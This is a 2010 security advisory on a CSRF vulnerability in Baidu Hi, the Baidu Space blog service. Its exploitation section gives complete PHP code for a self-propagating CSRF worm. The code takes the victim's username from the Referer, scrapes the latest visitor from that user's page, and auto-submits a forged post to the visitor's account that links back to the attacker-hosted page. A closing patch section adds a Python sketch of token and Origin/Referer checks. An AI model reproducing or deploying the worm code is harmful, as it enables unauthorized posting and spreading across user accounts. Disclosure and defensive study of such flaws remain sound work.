Baidu Hi CSRF Bug

Author: menzhi007
Blog: http://hi.baidu.com/menzhi007
Team: http://www.80vul.com
date: May 13, 2010

I. Analysis

Baidu Space (Baidu Hi) does not strictly validate the Referer header, and its token check is ineffective, which gives rise to a CSRF vulnerability. Combined with the "recent visitors" record shown on each user's space, this can be turned into a CSRF worm.

II. Exploitation

When a Baidu Space user who is browsing some page clicks a hyperlink (or image, etc.) by mistake, such as <a href=http://www.l4mp.org/lab/pdf.php>Hi</a>, pdf.php extracts the username from the Referer, then sends a request to fetch the most recent visitor recorded on that user's homepage, and uses CSRF to publish the same article on that visitor's space, thereby propagating the worm.

Sample code:

<?php
// Pull the victim's Baidu Space username out of the Referer URL.
$referer = $_SERVER['HTTP_REFERER'];
preg_match("/http:\/\/hi\.baidu\.com\/([a-z0-9_%]+)\/blog/i",$referer,$sitename);
// Fetch that user's homepage and pick out the most recent visitor listed there.
$result = get_data("hi.baidu.com","/".$sitename[1]);

//preg_match("/\[\"(([a-z0-9_%])+)\"\,\"[a-z0-9_%]+\"\,\"/i",$result,$match_valid);
preg_match("/<a href=\"\/([a-z0-9_%]+)\" target=\"_blank\" class=\"ucard\"/i",$result,$match);

if(!empty($match[1])&&!empty($sitename[1])) {

// Self-submitting form aimed at the visitor's /commit endpoint. Note that bdstoken
// carries a fixed value; the server accepting it is the failed token check described above.
$show= '<body onload="document.form1.submit();">
<form name="form1" id="popFormSubmit" action=" http://hi.baidu.com/'.$match[1].'/commit" method="post" >
<input type="hidden" name="bdstoken" value="menzhi007">
<input type="hidden" name="ct" value="1">
<input type="hidden" name="cm" value="1">
<input type="hidden" name="spBlogID" >
<input type="hidden" name="spBlogCatName" value="默认分类">
<input id="edithid" name="edithid" type="hidden">
<input type="hidden" name="spRefURL" id="spRefURL">
<input type="hidden" name="spBlogTitle" value="Hi menzhi007">
<input type="hidden" name="spBlogText" value="Hi Hero!<br>参考: <a href=http://www.l4mp.org/lab/pdf.php>http://www.l4mp.org/lab/pdf</a>">
<input type="hidden" name="spBlogCatName" value="%C4%AC%C8%CF%B7%D6%C0%E0">
<input type="hidden" name="spIsCmtAllow" value="1">
<input type="hidden" name="spBlogPower" value="0">
<input type="hidden" name="spShareNotAllow" value="0">
<input type="hidden" name="spVcode">
<input type="hidden" name="spVerifyKey">
<input name="tj" type="submit" value=" 发表文章 " >
</form>
</body>';
echo $show;

} else {
echo "Hi";
}

// Minimal raw HTTP/1.1 GET over a plain socket; returns the full response as a string.
function get_data($host,$path) {

    $cmd = '';
    $data = "GET ".$path."  HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    if (!$fp) {
        return '';
    }
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    fclose($fp);
    return $resp;

}

?>

III. Patch
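The advisory leaves this section empty. As an added illustration (not the vendor's fix or the author's code), the following shows the two server-side checks whose absence the analysis describes: a per-session token that a fixed value like "menzhi007" cannot satisfy, and a strict Origin/Referer check that rejects a /commit POST arriving from another host. Function names, the HMAC-based token derivation and the demo request values are assumptions for the example.

```python
import hmac
import hashlib
import secrets
from typing import Optional
from urllib.parse import urlparse

# Host of the application being protected (from the advisory).
SITE_HOST = "hi.baidu.com"


def issue_token(session_secret: bytes, session_id: str) -> str:
    """Derive the per-session token (bdstoken) the server will later expect.

    Binding the token to the session is what makes a hard-coded value in a
    cross-site form unverifiable. (Assumed derivation, not Baidu's scheme.)
    """
    return hmac.new(session_secret, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_secret: bytes, session_id: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted token against the derived one."""
    if not submitted:
        return False
    return hmac.compare_digest(issue_token(session_secret, session_id), submitted)


def source_valid(headers: dict) -> bool:
    """Origin (preferred) or Referer must name our own host.

    A state-changing POST carrying neither header is rejected instead of being
    waved through, which is the lax behaviour the advisory relies on.
    """
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    return urlparse(src).hostname == SITE_HOST


def accept_commit(session_secret: bytes, session_id: str, headers: dict, form: dict) -> bool:
    """Both checks must pass before a /commit POST is honoured."""
    return source_valid(headers) and token_valid(session_secret, session_id, form.get("bdstoken"))


if __name__ == "__main__":
    secret, sid = secrets.token_bytes(32), "session-abc"  # constructed demo values
    # Constructed request shaped like the advisory's auto-submitting form.
    forged = ({"Referer": "http://www.l4mp.org/lab/pdf.php"}, {"bdstoken": "menzhi007"})
    genuine = ({"Origin": "http://hi.baidu.com"}, {"bdstoken": issue_token(secret, sid)})
    print("forged accepted:", accept_commit(secret, sid, *forged))    # False
    print("genuine accepted:", accept_commit(secret, sid, *genuine))  # True
```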
